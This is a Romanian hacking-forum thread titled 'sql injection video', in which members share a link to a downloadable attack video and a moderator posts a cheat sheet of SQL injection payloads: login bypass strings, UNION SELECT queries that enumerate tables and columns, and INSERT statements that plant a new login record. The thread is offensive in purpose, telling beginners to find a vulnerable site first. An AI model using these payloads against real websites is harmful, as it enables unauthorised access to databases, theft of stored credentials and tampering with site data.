Filehost.ro - gazduire fisiere
EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server.
Nou pe simpatie:
Profil bella_sexy
Femeie
25 ani
Bucuresti
cauta Barbat
27 - 48 ani
EliteHackersReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
EliteHackers / Windows - Hacking & Tools /

sql injection video

Pagini: 1 Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, kooze, r3v
#1
lexx
EliteHackers Member
Postari: 11
http://exploitz.nm.ru/video_hack.rar
metod simpla dar sa fiti atenti


 
   
#2
0v1d1u
EliteHackers Bronze
Postari: 38
Ce vrea sa fie asta? 

_______________________________________





 
   
#3
sigismunt
EliteHackers Member
Postari: 18
cine stie cunoaste 

 
   
#4
Puscas_marin
Moderator
Postari: 315
lol voi nu ati auzit de sql infection?

Code:

logare ca prima persoana in baza de date sql`

--text box--
login: hi' or 1=1--
pass: hi'or 1=1--

--bara url--
http://site/index.asp?id=hi' or 1=1--

Nota: Poti inlocui unde e 1 cu a sau 0 etc.

'primirea numelor tabelelor'

--text box--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

--url bar--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

http://site/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

'pt a primi numele coloanelor'

--text box--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--

Nota: inlocuiti '"tablename text cu numele tabelului care il vreti...


--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--

'retreive getting data from table'

--text box--
UNION SELECT TOP 1 table_name FROM column_name--

Nota : inlocuiti table_name cu numele tabelului si column name cu numele coloanei...

--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 table_name FROM column_name--


'Introducerea de date in baza de date'

INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--

Nota: inlocuiti login_id,Login_name, and password cu numele coloanelor, inlocuiti table_name cu numele tabelului si valorile 111,name,pass cu orice vreti dar sa corespunda in ordinea coloanelor.

--url bar--
http://site/index.asp?id=10 INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--


1) Functia load_file desi tre sa ai FILE_PRIV
2) unde ai table_name='nume_tabela' e mai bine sa pui numele tabelei in hexa ptr ca de obi

Uite-l Si pe lexx, super, noroc ca avem giganti ai hack-ului printre noi )


_______________________________________
Deci asa se fac banii....da clik sa vezi

 
   
#5
sigismunt
EliteHackers Member
Postari: 18
bravo le stiam dar eu tot nu am reusit sa le aplic nu stiu cum se face la inceput sa aflii coloanele si altele    daca puteti baga un tutorial mai complex pt noob(sincer le am numai cu injection nu i-am dat de cap)     

 
   
#6
Exploit
Administrator
Din: I'm from everywhere..
Postari: 600
Io am incercat sa fac dar nu mi-a iesit.. poate vine cineva cu explicatii mai amanuntzite

_______________________________________
...:::Only God Can Judge Me:::...

 
   
#7
Puscas_marin
Moderator
Postari: 315
in primul rand trebuie sa gasesti un site vulnerabil la Sql 

_______________________________________
Deci asa se fac banii....da clik sa vezi

 
   
Pagini: 1  
Mergi la